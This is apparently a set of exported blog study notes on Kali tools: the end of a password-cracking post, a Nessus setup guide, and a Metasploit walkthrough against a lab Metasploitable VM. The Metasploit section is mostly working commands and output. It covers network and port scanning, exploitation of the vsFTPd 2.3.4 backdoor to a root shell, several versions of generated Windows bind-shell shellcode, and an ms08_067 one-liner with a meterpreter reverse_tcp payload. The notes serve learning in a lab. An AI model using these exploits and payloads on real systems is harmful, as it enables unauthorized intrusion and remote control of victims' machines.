<pre><code>> gzip -dc < rockyou.txt.gz > ~/wordlist.txt
</code></pre>
<p>then we got wordlist.txt.</p>
<h3 id="resource">Resource</h3>
<ul>
<li><a href="http://www.openwall.com/john/doc/EXAMPLES.shtml">John the Ripper usage examples</a></li>
<li><a href="https://www.corelan.be/index.php/2009/02/24/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper/">Cheatsheet : Cracking WPA2 PSK with Backtrack 4, aircrack-ng and John The Ripper</a></li>
</ul>
Heron Yanghttp://www.blogger.com/profile/13927972839081766610noreply@blogger.com1tag:blogger.com,1999:blog-3461379477139754715.post-20291349377707204342016-03-14T14:35:00.000+08:002016-03-14T14:35:48.914+08:00Kali Tool Series - NessusNessus is an open source <strong>vulnerability scanner</strong>, which scans a network for potential security risks and provide detailed reports.<br />
Few facts about Nessus:<br />
<ul>
<li>founded by Renuad Deraison in 1998</li>
<li>supports multiple systems: Windows, Linux, Mac OS X, Sun, Solaris, etc</li>
</ul>
<h3 id="feature">
Feature</h3>
<ul>
<li>host/port discovery</li>
<li>identifies vulnerabilities</li>
<li>checks whether the systems have the latest software patches</li>
<li>tries with default passwords, common passwords on system accounts</li>
<li>malware/botnet detection</li>
</ul>
(from <a href="http://www.securitylearn.net/tag/nessus-tutorial/">reference 1</a> and <a href="https://www.cybrarypentesting.com/nessus-vulnerability-scanner-tutorial/">reference 2</a>)<br />
<h3 id="installandsetup">
Install and Setup</h3>
Download Nessus at <a href="http://www.tenable.com/products/nessus/select-your-operating-system">its official site</a> (registration is required, Home version is for free)<br />
After installation, open <a href="https://localhost:8834/">https://localhost:8834/</a> on your machine to start Nessus.<br />
<h3 id="component">
Component</h3>
<ul>
<li><strong>Reports</strong>: reports from all the past scans of a target or a set of targets</li>
<li><strong>Scans</strong>: configure or run a new scan</li>
<li><strong>Policies</strong>: configure the things you would like to run for the scans</li>
<li><strong>Users</strong>: different users may have different permission to apply different policies</li>
</ul>
(<a href="https://jonathansblog.co.uk/vulnerability-scanning-with-nessus-tutorial">Reference</a>)<br />
<h3 id="policy">
Policy</h3>
Open <a href="https://localhost:8834/">https://localhost:8834/</a>, and click on “+New Policy” button in the Policy tab.<br />
The information of scanner templates provided by the policy wizard can be found <a href="https://www.cybrarypentesting.com/nessus-scan-policies-and-report/">here</a>.<br />
<h4 id="settings">
Settings</h4>
<ul>
<li><strong>Basics</strong>
<ul>
<li>general: name / description</li>
<li>permission: private / share</li>
</ul>
</li>
<li><strong>Discovery</strong>: host disvocery / port scanning / service discovery</li>
<li><strong>Assessment</strong>: for “web application” only</li>
<li><strong>Report</strong>: configure the scan reports</li>
<li><strong>Advanced</strong>: performance settings, additional checks, and logging features</li>
</ul>
<h3 id="scan">
Scan</h3>
Click on “+New Scan” button, then pick scanner template, or user created policy.<br />
<h4 id="general">
General</h4>
<ul>
<li>name</li>
<li>description</li>
<li>folder</li>
<li>scanner</li>
<li>targets: IP or domain name (ex. <code>192.168.1.0/24, 192.168.2.1, example.com</code>)</li>
<li>upload targets: a file that contains target list</li>
</ul>
<h4 id="schedule">
Schedule</h4>
Default is disabled.<br />
<ul>
<li>launch: pick its frequency - once, daily, weekly, monthly, or yearly</li>
<li>starts on: start time</li>
<li>time zone</li>
<li>summary</li>
</ul>
<h4 id="emailnotification">
Email Notification</h4>
Setting up SMTP is required.<br />
<h4 id="launch">
Launch</h4>
Click on the play icon or the “launch” button, the scan will start directly.<br />
<h3 id="viewresults">
View Results</h3>
<div class="separator" style="clear: both; text-align: center;">
</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxKZC94Sb_z6uXxxAREJpGuiSEIsNcTcNw2u0zD7XLqq3qjClzYs8EWduN3SGZjsqvfvsTOldHKzSqg79mbbacXXyyksALB_we03fecj_M8JQM-P2fxky7Pr3NsLXKwshrYKoGHhh0SsX-/s1600/Screen+Shot+2016-03-14+at+1.53.01+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="352" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxKZC94Sb_z6uXxxAREJpGuiSEIsNcTcNw2u0zD7XLqq3qjClzYs8EWduN3SGZjsqvfvsTOldHKzSqg79mbbacXXyyksALB_we03fecj_M8JQM-P2fxky7Pr3NsLXKwshrYKoGHhh0SsX-/s640/Screen+Shot+2016-03-14+at+1.53.01+PM.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">The result page</td></tr>
</tbody></table>
<div>
<br /></div>
<ul>
<li><strong>Configure</strong>: directs back to the scan settings</li>
<li><strong>Audit Trail</strong>: pulls up the audit trail dialogue</li>
<li><strong>Launch</strong></li>
<li><strong>Export</strong>: allows you to save the scan result in Nessus (.nessus), PDF, HTML, CSV, or Nessus DB.</li>
</ul>
<h3 id="turnonoffnessus">
Turn On/Off Nessus</h3>
Nessus runs as service in background as default.<br />
To turn on:<br />
<pre><code>sudo launchctl load -w /Library/LaunchDaemons/com.tenablesecurity.nessusd.plist
</code></pre>
To turn off:<br />
<pre><code>sudo launchctl unload -w /Library/LaunchDaemons/com.tenablesecurity.nessusd.plist
</code></pre>
Heron Yanghttp://www.blogger.com/profile/13927972839081766610noreply@blogger.com1tag:blogger.com,1999:blog-3461379477139754715.post-67136833546654975742016-03-12T00:45:00.000+08:002016-03-19T20:34:06.897+08:00Kali Tool Series - Metasploit<h3 id="preface">Preface</h3>
<p>This is the first post of <em>Kali Tool Series</em> I wrote as my own studying notes.</p>
<h3 id="introduction">Introduction</h3>
<p>Metasploit is a vulnerability and exploitation framework with a collection of exploits designed for security proessionals to perform security assessments.</p>
<p>Few facts about Metasploit:</p>
<ul>
<li>written in Ruby</li>
<li>acquired by Rapid7</li>
<li>integrates with other common penetration testing tools: Nessus, Nmap</li>
</ul>
<p>Also, it’s worth to know that a successful service exploitation requires following elements (<a href="http://raidersec.blogspot.tw/2012/03/introduction-to-metasploit.html">reference</a>):</p>
<ul>
<li><strong>vulnerability</strong>: a flaw in a system which can be utilized as an avenue of attack</li>
<li><strong>exploit</strong>: a program specifically designed to leverage a vulnerability</li>
<li><strong>payload</strong>: code to be run on the system <em>after</em> the vulnerability has been exploited</li>
</ul>
<h3 id="modules">Modules</h3>
<p>Before started, it’s better to briefly understand the modules in it, which can be roughly grouped into followings (reference is <a href="https://www.gracefulsecurity.com/introduction-to-metasploit/">here</a>):</p>
<h4 id="auxiliarymodules">Auxiliary modules</h4>
<p>Useful tools like for:</p>
<ul>
<li>intormation gathering</li>
<li>enumeration</li>
<li>port scanning</li>
<li>connecting to SQL databases</li>
<li>etc</li>
</ul>
<h4 id="exploitmodules">Exploit modules</h4>
<p>Modules used to deliver exploit code to a target system.</p>
<h4 id="postmodules">Post modules</h4>
<p>Post exploitation tools for things like extracting passwords hashes/access tokens, taking screenshots, key-logging and downloading files.</p>
<h4 id="payloadmodules">Payload modules</h4>
<p>Malicious payloads used after an exploitation. In Metasploit, it’s better to upload a copy of “meterpreter” payload, which opens a meterpreter backdoor smoothly.</p>
<h3 id="testingenvironment">Testing Environment</h3>
<p>Okay, since what we are doing here may create some changes (or you can say damages) on the target machine. We <em>can’t do this on a deployed machine without permission</em>. Therefore, I setup a <a href="https://www.offensive-security.com/metasploit-unleashed/requirements/">Metasploitable virtual machine</a> as my target, which contains lots of vulnerabilities by default.</p>
<p>Both the target (Metasploitable) and the attacker (Kali) are virtual machines under the same local network in my following tests.</p>
<h3 id="workingflow">Working Flow</h3>
<p>Here’s a demo flow using Metasploit. </p>
<h4 id="1.informationgathering">1. Information Gathering</h4>
<p><strong>Host Discovery</strong></p>
<p>First, we have to locate the machine by scanning my local network (192.168.0.x).</p>
<p>I’m using ARP scanning:</p>
<pre><code>msf > use auxiliary/scanner/discovery/arp_sweep
msf auxiliary(arp_sweep) > show options
Module options (auxiliary/scanner/discovery/arp_sweep):
Name Current Setting Required Description
---- --------------- -------- -----------
INTERFACE no The name of the interface
RHOSTS yes The target address range or CIDR identifier
SHOST no Source IP Address
SMAC no Source MAC Address
THREADS 1 yes The number of concurrent threads
TIMEOUT 5 yes The number of seconds to wait for new data
msf auxiliary(arp_sweep) > set RHOSTS 192.168.63.0-255
RHOSTS => 192.168.63.0-255
msf auxiliary(arp_sweep) > run
[*] 192.168.63.1 appears to be up (VMware, Inc.).
[*] 192.168.63.2 appears to be up (VMware, Inc.).
[*] 192.168.63.156 appears to be up (VMware, Inc.).
[*] 192.168.63.254 appears to be up (VMware, Inc.).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
</code></pre>
<p>As we can see, 192.168.63.156 would be our target machine since others don’t seem like a normal device.</p>
<p>In addition, of course, one can use Nmap to do all the work for this part instead:</p>
<pre><code>nmap -v -sV 192.168.63.1/24
</code></pre>
<p><strong>Port Scanning</strong></p>
<p>Then, we scan the open port of our target machine (192.168.63.156):</p>
<pre><code>msf > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > show options
Module options (auxiliary/scanner/portscan/tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
CONCURRENCY 10 yes The number of concurrent ports to check per host
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS 192.168.63.156 yes The target address range or CIDR identifier
THREADS 50 yes The number of concurrent threads
TIMEOUT 1000 yes The socket connect timeout in milliseconds
msf auxiliary(tcp) > run
[*] 192.168.63.156:25 - TCP OPEN
[*] 192.168.63.156:23 - TCP OPEN
[*] 192.168.63.156:22 - TCP OPEN
[*] 192.168.63.156:21 - TCP OPEN
[*] 192.168.63.156:53 - TCP OPEN
[*] 192.168.63.156:80 - TCP OPEN
… (dismiss)
</code></pre>
<p>By knowing which ports the machine is using, we can know which services are running on it.</p>
<h4 id="2.findvulnerability">2. Find Vulnerability</h4>
<p>To find vulnerability, we may need to know the version of the service, and look it out on the database to see if there’s any known vulnerability.</p>
<p><strong>Find Versions</strong></p>
<p>SSH:</p>
<pre><code>msf > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(ssh_version) > set RHOSTS 192.168.63.156
RHOSTS => 192.168.63.156
msf auxiliary(ssh_version) > run
[*] 192.168.63.156:22, SSH server version: SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
</code></pre>
<p>FTP:</p>
<pre><code>msf > use auxiliary/scanner/ftp/ftp_version
msf auxiliary(ftp_version) > set RHOSTS 192.168.63.156
RHOSTS => 192.168.63.156
msf auxiliary(ftp_version) > run
[*] 192.168.63.156:21 FTP Banner: '220 (vsFTPd 2.3.4)\x0d\x0a'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
</code></pre>
<p>As we can see, the target machine is running vsFTPd 2.3.4.</p>
<p><strong>Check Database</strong></p>
<p>Let’s focus on vsFTPd, which is more likely to be vulnerable comparing to SSH. So, go to <a href="http://www.exploit-db.com/search/">exploit-db</a>, search keyword “vsFTPd”, and luckily we got <a href="https://www.exploit-db.com/exploits/17491/">“VSFTPD 2.3.4 - Backdoor Command Execution”</a>.</p>
<p>To sum what we’ve got so far: the target machine is running an outdated service which contains a well-known flaw.</p>
<p><strong>Find the Exploit Method</strong></p>
<p>Then, let’s search it on your metesploit:</p>
<pre><code>msf > search vsftpd
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent VSFTPD v2.3.4 Backdoor Command Execution
</code></pre>
<p>Nice, the module <code>exploit/unix/ftp/vsftpd_234_backdoor</code> is what we need now.</p>
<h4 id="3.exploit">3. Exploit</h4>
<pre><code>msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
cmd/unix/interact normal Unix Command, Interact with Established Connection
msf exploit(vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.63.156 yes The target address
RPORT 21 yes The target port
Payload options (cmd/unix/interact):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Automatic
</code></pre>
<p>There’s only one payload we can apply for this exploit, <code>cmd/unix/interact</code>, which means that the interaction will be setup directly after exploitation.</p>
<p>Now, we succeed:</p>
<pre><code>msf exploit(vsftpd_234_backdoor) > run
[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling...
[+] UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 2 opened (192.168.63.155:53640 -> 192.168.63.156:6200) at 2016-03-11 21:22:39 +0800
whoami
root
ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz
</code></pre>
<h3 id="custompayload">Custom Payload</h3>
<p>In some cases, we may need custom payloads, like <a href="http://heron-note.blogspot.tw/2014/11/alphanumeric-shellcode-of-execbinsh.html">what I did for Secure Programming class in 2014</a>.</p>
<p>Pick a payload and its generate shellcode (using <code>payload/windows/shell_bind_tcp</code> as example here):</p>
<pre><code>msf > use payload/windows/shell_bind_tcp
msf payload(shell_bind_tcp) > generate
# windows/shell_bind_tcp - 328 bytes
# http://www.metasploit.com
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
buf =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50" +
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
"\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7" +
"\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78" +
"\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3" +
"\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01" +
"\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58" +
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3" +
"\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a" +
"\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32" +
"\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff" +
"\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b" +
"\x00\xff\xd5\x6a\x08\x59\x50\xe2\xfd\x40\x50\x40\x50\x68" +
"\xea\x0f\xdf\xe0\xff\xd5\x97\x68\x02\x00\x11\x5c\x89\xe6" +
"\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x57\x68\xb7" +
"\xe9\x38\xff\xff\xd5\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57" +
"\x97\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89" +
"\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" +
"\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50" +
"\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f" +
"\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d" +
"\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff" +
"\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72" +
"\x6f\x6a\x00\x53\xff\xd5"
</code></pre>
<p>Avoid the shellcode contains specific characters (take \x00 as example):</p>
<pre><code>msf payload(shell_bind_tcp) > generate -b '\x00'
# windows/shell_bind_tcp - 355 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
buf =
"\xbf\x41\x3a\x72\xae\xda\xdf\xd9\x74\x24\xf4\x58\x29\xc9" +
"\xb1\x53\x31\x78\x12\x03\x78\x12\x83\x81\x3e\x90\x5b\xfd" +
"\xd7\xd6\xa4\xfd\x27\xb7\x2d\x18\x16\xf7\x4a\x69\x09\xc7" +
"\x19\x3f\xa6\xac\x4c\xab\x3d\xc0\x58\xdc\xf6\x6f\xbf\xd3" +
"\x07\xc3\x83\x72\x84\x1e\xd0\x54\xb5\xd0\x25\x95\xf2\x0d" +
"\xc7\xc7\xab\x5a\x7a\xf7\xd8\x17\x47\x7c\x92\xb6\xcf\x61" +
"\x63\xb8\xfe\x34\xff\xe3\x20\xb7\x2c\x98\x68\xaf\x31\xa5" +
"\x23\x44\x81\x51\xb2\x8c\xdb\x9a\x19\xf1\xd3\x68\x63\x36" +
"\xd3\x92\x16\x4e\x27\x2e\x21\x95\x55\xf4\xa4\x0d\xfd\x7f" +
"\x1e\xe9\xff\xac\xf9\x7a\xf3\x19\x8d\x24\x10\x9f\x42\x5f" +
"\x2c\x14\x65\x8f\xa4\x6e\x42\x0b\xec\x35\xeb\x0a\x48\x9b" +
"\x14\x4c\x33\x44\xb1\x07\xde\x91\xc8\x4a\xb7\x56\xe1\x74" +
"\x47\xf1\x72\x07\x75\x5e\x29\x8f\x35\x17\xf7\x48\x39\x02" +
"\x4f\xc6\xc4\xad\xb0\xcf\x02\xf9\xe0\x67\xa2\x82\x6a\x77" +
"\x4b\x57\x06\x7f\xea\x08\x35\x82\x4c\xf9\xf9\x2c\x25\x13" +
"\xf6\x13\x55\x1c\xdc\x3c\xfe\xe1\xdf\x53\xa3\x6c\x39\x39" +
"\x4b\x39\x91\xd5\xa9\x1e\x2a\x42\xd1\x74\x02\xe4\x9a\x9e" +
"\x95\x0b\x1b\xb5\xb1\x9b\x90\xda\x05\xba\xa6\xf6\x2d\xab" +
"\x31\x8c\xbf\x9e\xa0\x91\x95\x48\x40\x03\x72\x88\x0f\x38" +
"\x2d\xdf\x58\x8e\x24\xb5\x74\xa9\x9e\xab\x84\x2f\xd8\x6f" +
"\x53\x8c\xe7\x6e\x16\xa8\xc3\x60\xee\x31\x48\xd4\xbe\x67" +
"\x06\x82\x78\xde\xe8\x7c\xd3\x8d\xa2\xe8\xa2\xfd\x74\x6e" +
"\xab\x2b\x03\x8e\x1a\x82\x52\xb1\x93\x42\x53\xca\xc9\xf2" +
"\x9c\x01\x4a\x02\xd7\x0b\xfb\x8b\xbe\xde\xb9\xd1\x40\x35" +
"\xfd\xef\xc2\xbf\x7e\x14\xda\xca\x7b\x50\x5c\x27\xf6\xc9" +
"\x09\x47\xa5\xea\x1b"
</code></pre>
<p>So, we get a payload withtou \x00, which is reasonably longer than the previous one.</p>
<p>Then, we can apply some encoders onto the shellcode like. To list all available encoders:</p>
<pre><code>msf payload(shell_bind_tcp) > show encoders
Encoders
========
Name Disclosure Date Rank Description
---- --------------- ---- -----------
cmd/echo good Echo Command Encoder
cmd/generic_sh manual Generic Shell Variable Substitution Command Encoder
cmd/ifs low Generic ${IFS} Substitution Command Encoder
cmd/perl normal Perl Command Encoder
cmd/powershell_base64 excellent Powershell Base64 Command Encoder
cmd/printf_php_mq manual printf(1) via PHP magic_quotes Utility Command Encoder
generic/eicar manual The EICAR Encoder
… (dismiss)
</code></pre>
<p>Generate code with decoder:</p>
<pre><code>msf payload(shell_bind_tcp) > generate -e x86/nonalpha
# windows/shell_bind_tcp - 470 bytes
# http://www.metasploit.com
# Encoder: x86/nonalpha
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
buf =
"\x66\xb9\xff\xff\xeb\x19\x5e\x8b\xfe\x83\xc7\x6a\x8b\xd7" +
"\x3b\xf2\x7d\x0b\xb0\x7b\xf2\xae\xff\xcf\xac\x28\x07\xeb" +
"\xf1\xeb\x6f\xe8\xe2\xff\xff\xff\x17\x2b\x29\x29\x09\x31" +
"\x1a\x29\x24\x29\x31\x2f\x03\x33\x2a\x22\x32\x32\x06\x06" +
"\x23\x23\x15\x30\x23\x37\x1a\x22\x21\x2a\x21\x13\x13\x04" +
"\x08\x27\x13\x2f\x04\x27\x2b\x13\x10\x11\x22\x2b\x2b\x2b" +
"\x13\x13\x11\x25\x24\x13\x14\x24\x13\x24\x13\x07\x24\x13" +
"\x06\x0d\x2e\x1a\x13\x18\x0e\x17\x24\x24\x24\x11\x22\x25" +
"\x15\x37\x37\x37\x27\x2b\x25\x25\x25\x35\x25\x2d\x25\x25" +
"\x28\x25\x13\x02\x2d\x25\x35\x13\x25\x13\x06\x34\x09\x0c" +
"\x11\x28\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x7b" +
"\x8b\x7b\x30\x8b\x7b\x0c\x8b\x7b\x14\x8b\x7b\x28\x0f\xb7" +
"\x7b\x26\x31\xff\xac\x3c\x7b\x7c\x02\x2c\x20\xc1\xcf\x0d" +
"\x01\xc7\xe2\xf2\x7b\x7b\x8b\x7b\x10\x8b\x7b\x3c\x8b\x7b" +
"\x11\x7b\xe3\x7b\x01\xd1\x7b\x8b\x7b\x20\x01\xd3\x8b\x7b" +
"\x18\xe3\x3a\x7b\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf" +
"\x0d\x01\xc7\x38\xe0\x7b\xf6\x03\x7d\xf8\x3b\x7d\x24\x7b" +
"\xe4\x7b\x8b\x7b\x24\x01\xd3\x7b\x8b\x0c\x7b\x8b\x7b\x1c" +
"\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x7b\x24\x24\x5b\x5b\x7b" +
"\x7b\x7b\x7b\xff\xe0\x5f\x5f\x7b\x8b\x12\xeb\x8d\x5d\x7b" +
"\x33\x32\x00\x00\x7b\x7b\x7b\x32\x5f\x7b\x7b\x7b\x7b\x26" +
"\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x7b\x7b\x7b\x29" +
"\x80\x7b\x00\xff\xd5\x7b\x08\x7b\x7b\xe2\xfd\x40\x7b\x40" +
"\x7b\x7b\xea\x0f\xdf\xe0\xff\xd5\x97\x7b\x02\x00\x11\x5c" +
"\x89\xe6\x7b\x10\x7b\x7b\x7b\xc2\xdb\x37\x7b\xff\xd5\x7b" +
"\x7b\xb7\xe9\x38\xff\xff\xd5\x7b\x7b\x7b\xec\x3b\xe1\xff" +
"\xd5\x7b\x97\x7b\x7b\x7b\x7b\x7b\xff\xd5\x7b\x7b\x7b\x7b" +
"\x00\x89\xe3\x7b\x7b\x7b\x31\xf6\x7b\x12\x7b\x7b\xe2\xfd" +
"\x7b\xc7\x7b\x24\x3c\x01\x01\x8d\x7b\x24\x10\xc6\x00\x7b" +
"\x7b\x7b\x7b\x7b\x7b\x7b\x7b\x7b\x7b\x7b\x7b\x7b\x7b\x7b" +
"\xcc\x3f\x86\xff\xd5\x89\xe0\x7b\x7b\x7b\xff\x30\x7b\x08" +
"\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x7b\x7b\xa6\x95\xbd" +
"\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x7b\x05\xbb\x7b" +
"\x13\x7b\x7b\x7b\x00\x7b\xff\xd5"
</code></pre>
<p>or, all together:</p>
<pre><code>msf payload(shell_bind_tcp) > generate -b '\x00' -e x86/alpha_mixed -f output.txt
[*] Writing 3347 bytes to output.txt...
msf payload(shell_bind_tcp) > cat output.txt
[*] exec: cat output.txt
# windows/shell_bind_tcp - 718 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
buf =
"\x89\xe5\xd9\xe5\xd9\x75\xf4\x5d\x55\x59\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" +
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" +
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" +
"\x42\x75\x4a\x49\x49\x6c\x79\x78\x4c\x42\x65\x50\x75\x50" +
"\x33\x30\x43\x50\x6b\x39\x5a\x45\x56\x51\x4f\x30\x75\x34" +
"\x4c\x4b\x50\x50\x64\x70\x6c\x4b\x70\x52\x66\x6c\x6c\x4b" +
"\x46\x32\x77\x64\x6e\x6b\x62\x52\x76\x48\x54\x4f\x68\x37" +
"\x70\x4a\x76\x46\x74\x71\x79\x6f\x4e\x4c\x67\x4c\x43\x51" +
"\x63\x4c\x63\x32\x34\x6c\x31\x30\x4b\x71\x58\x4f\x54\x4d" +
"\x53\x31\x48\x47\x6a\x42\x78\x72\x72\x72\x31\x47\x6e\x6b" +
"\x36\x32\x74\x50\x6c\x4b\x50\x4a\x75\x6c\x4c\x4b\x50\x4c" +
"\x42\x31\x63\x48\x68\x63\x52\x68\x76\x61\x6a\x71\x50\x51" +
"\x6e\x6b\x50\x59\x71\x30\x36\x61\x6a\x73\x6e\x6b\x73\x79" +
"\x64\x58\x6b\x53\x56\x5a\x47\x39\x6c\x4b\x35\x64\x6e\x6b" +
"\x55\x51\x39\x46\x75\x61\x4b\x4f\x4e\x4c\x6f\x31\x38\x4f" +
"\x66\x6d\x43\x31\x49\x57\x45\x68\x49\x70\x74\x35\x4c\x36" +
"\x54\x43\x73\x4d\x39\x68\x67\x4b\x33\x4d\x46\x44\x70\x75" +
"\x48\x64\x76\x38\x6c\x4b\x53\x68\x67\x54\x45\x51\x78\x53" +
"\x62\x46\x6e\x6b\x74\x4c\x72\x6b\x6e\x6b\x56\x38\x65\x4c" +
"\x36\x61\x58\x53\x4e\x6b\x46\x64\x6e\x6b\x65\x51\x4e\x30" +
"\x6c\x49\x32\x64\x75\x74\x47\x54\x51\x4b\x53\x6b\x61\x71" +
"\x63\x69\x31\x4a\x36\x31\x59\x6f\x6b\x50\x63\x6f\x53\x6f" +
"\x73\x6a\x6c\x4b\x32\x32\x6a\x4b\x6c\x4d\x71\x4d\x51\x78" +
"\x37\x43\x65\x62\x73\x30\x45\x50\x32\x48\x53\x47\x44\x33" +
"\x56\x52\x51\x4f\x70\x54\x71\x78\x50\x4c\x30\x77\x74\x66" +
"\x67\x77\x6b\x4f\x4e\x35\x4c\x78\x5a\x30\x65\x51\x37\x70" +
"\x37\x70\x51\x39\x4f\x34\x51\x44\x70\x50\x30\x68\x75\x79" +
"\x6b\x30\x72\x4b\x37\x70\x6b\x4f\x4e\x35\x63\x5a\x77\x78" +
"\x31\x49\x32\x70\x48\x62\x6b\x4d\x77\x30\x42\x70\x61\x50" +
"\x56\x30\x65\x38\x69\x7a\x66\x6f\x79\x4f\x69\x70\x39\x6f" +
"\x39\x45\x6e\x77\x52\x48\x67\x72\x67\x70\x44\x51\x43\x6c" +
"\x4e\x69\x6b\x56\x63\x5a\x54\x50\x32\x76\x71\x47\x31\x78" +
"\x4f\x32\x49\x4b\x37\x47\x32\x47\x69\x6f\x78\x55\x36\x37" +
"\x71\x78\x4d\x67\x5a\x49\x46\x58\x4b\x4f\x4b\x4f\x6a\x75" +
"\x50\x57\x45\x38\x74\x34\x7a\x4c\x65\x6b\x59\x71\x6b\x4f" +
"\x68\x55\x52\x77\x4a\x37\x63\x58\x43\x45\x62\x4e\x32\x6d" +
"\x31\x71\x79\x6f\x79\x45\x30\x68\x71\x73\x62\x4d\x62\x44" +
"\x43\x30\x6e\x69\x59\x73\x52\x77\x66\x37\x30\x57\x66\x51" +
"\x4b\x46\x63\x5a\x62\x32\x63\x69\x70\x56\x6b\x52\x39\x6d" +
"\x63\x56\x6f\x37\x73\x74\x55\x74\x77\x4c\x57\x71\x56\x61" +
"\x4c\x4d\x53\x74\x44\x64\x62\x30\x6a\x66\x37\x70\x51\x54" +
"\x42\x74\x52\x70\x61\x46\x66\x36\x70\x56\x71\x56\x43\x66" +
"\x32\x6e\x63\x66\x70\x56\x31\x43\x72\x76\x33\x58\x31\x69" +
"\x68\x4c\x75\x6f\x4c\x46\x69\x6f\x4e\x35\x4f\x79\x39\x70" +
"\x52\x6e\x70\x56\x77\x36\x6b\x4f\x30\x30\x61\x78\x53\x38" +
"\x4b\x37\x57\x6d\x33\x50\x39\x6f\x38\x55\x4f\x4b\x68\x70" +
"\x6d\x65\x6d\x72\x51\x46\x50\x68\x59\x36\x6e\x75\x4f\x4d" +
"\x6f\x6d\x6b\x4f\x38\x55\x67\x4c\x47\x76\x73\x4c\x46\x6a" +
"\x4d\x50\x6b\x4b\x49\x70\x74\x35\x34\x45\x4d\x6b\x57\x37" +
"\x76\x73\x74\x32\x32\x4f\x33\x5a\x55\x50\x36\x33\x79\x6f" +
"\x6a\x75\x41\x41"
</code></pre>
<h3 id="scripting">Scripting</h3>
<p>Metasploit framework supports the users write scripts to control the process. There are three ways to read a script:</p>
<ol>
<li><pre><code>> msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST [IP]; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST [IP]; run"
</code></pre></li>
<li><pre><code>> msfconsole -r my_script.rc
</code></pre></li>
